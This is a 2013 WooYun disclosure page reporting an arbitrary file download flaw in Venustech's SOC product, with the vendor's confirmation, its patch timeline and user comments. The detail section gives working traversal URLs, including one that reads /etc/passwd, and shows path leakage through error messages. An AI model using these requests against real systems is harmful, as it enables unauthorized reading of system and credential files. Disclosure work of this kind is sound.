当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024296

漏洞标题:启明星辰SOC任意文件下载漏洞

相关厂商:北京启明星辰信息安全技术有限公司

漏洞作者: piaox

提交时间:2013-05-23 01:07

修复时间:2013-08-21 01:07

公开时间:2013-08-21 01:07

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-23: 细节已通知厂商并且等待厂商处理中
2013-05-23: 厂商已经确认,细节仅向厂商公开
2013-05-26: 细节向第三方安全合作伙伴开放
2013-07-17: 细节向核心白帽子及相关领域专家公开
2013-07-27: 细节向普通白帽子公开
2013-08-06: 细节向实习白帽子公开
2013-08-21: 细节向公众公开

简要描述:

启明星辰soc在导出交换机syslog配置模板时过滤不严,导致任意文件下载

详细说明:

(1)、下载huawei.switch.xml
http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Huawei.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network
(2)、下载dell.force10.switch.xml
http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Dell.Force10.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network
其中

eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==

这段为固定base64,没什么影响。
(3)、报错暴露出真实物理路径
http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Netflow.v5.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=../
SOC抛错处理不当:

x1.jpg


x2.jpg

得出物理路径

漏洞证明:

http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=passwd&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/../../../../../../../etc

x3.jpg


x4.jpg


x5.jpg

修复方案:

你们是专家

版权声明:转载请注明来源 piaox@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-05-23 11:24

厂商回复:

感谢!我们正在处理。

最新状态:

2013-06-09:5月24日:针对该漏洞,内部发布了《应急响应方案》,为客户提供应急处置。5月29日:针对该漏洞的第一批补丁包发布。6月5日:经过修复,针对该安全漏洞的所有补丁包已经在6月5日正式发布。最终客户可以联系与之接口的启明星辰公司商务和技术人员获取相关补丁包。


漏洞评价:

评论

  1. 2013-05-23 08:29 | clzzy ( 普通白帽子 | Rank:176 漏洞数:18 )

    打酱油

  2. 2013-05-23 09:20 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    什么情况

  3. 2013-05-23 09:32 | Master ( 路人 | Rank:29 漏洞数:10 )

    叼,无处不洞

  4. 2013-05-23 11:37 | 褪色的黑 ( 实习白帽子 | Rank:68 漏洞数:20 | 啄木鸟。。。。。。。。。。)

    我对面就坐着启明星辰的人。。。。。

  5. 2013-05-23 12:25 | Master ( 路人 | Rank:29 漏洞数:10 )

    @褪色的黑 我知道你是谁了,我也知道你的工作地点了。

  6. 2013-05-23 12:50 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ?)

    @褪色的黑 难不成是和 Drizzle.Risk一起的。哈哈

  7. 2013-05-23 13:21 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    求细节..

  8. 2013-05-23 13:22 | deeRix ( 路人 | Rank:11 漏洞数:2 )

    泰合已经在处理了。

  9. 2013-05-23 14:45 | onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)

    @deeRix 泰合...哈哈..

  10. 2013-05-23 15:06 | deeRix ( 路人 | Rank:11 漏洞数:2 )

    @onlycjeg (σ`・д・)σ

  11. 2013-05-23 15:41 | 牛£金钢 ( 路人 | Rank:12 漏洞数:4 | 我是新手,还需要学习,大神们要指点下了.....)

    我对面就坐着启明星辰的人。。。。。 +1

  12. 2013-05-23 16:42 | dreamk ( 路人 | Rank:11 漏洞数:3 | 穿梭在黑与白之间)

    呃。。。我对面也坐着个启明的人,启明队伍庞大啊

  13. 2013-05-24 10:30 | 褪色的黑 ( 实习白帽子 | Rank:68 漏洞数:20 | 啄木鸟。。。。。。。。。。)

    @Master ???????你真知道吗???

  14. 2013-05-24 15:00 | Master ( 路人 | Rank:29 漏洞数:10 )

    @褪色的黑 呵呵,目测我能猜到。

  15. 2013-05-24 16:02 | 褪色的黑 ( 实习白帽子 | Rank:68 漏洞数:20 | 啄木鸟。。。。。。。。。。)

    @Master 猜猜啊

  16. 2013-06-03 12:41 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

    看到咯..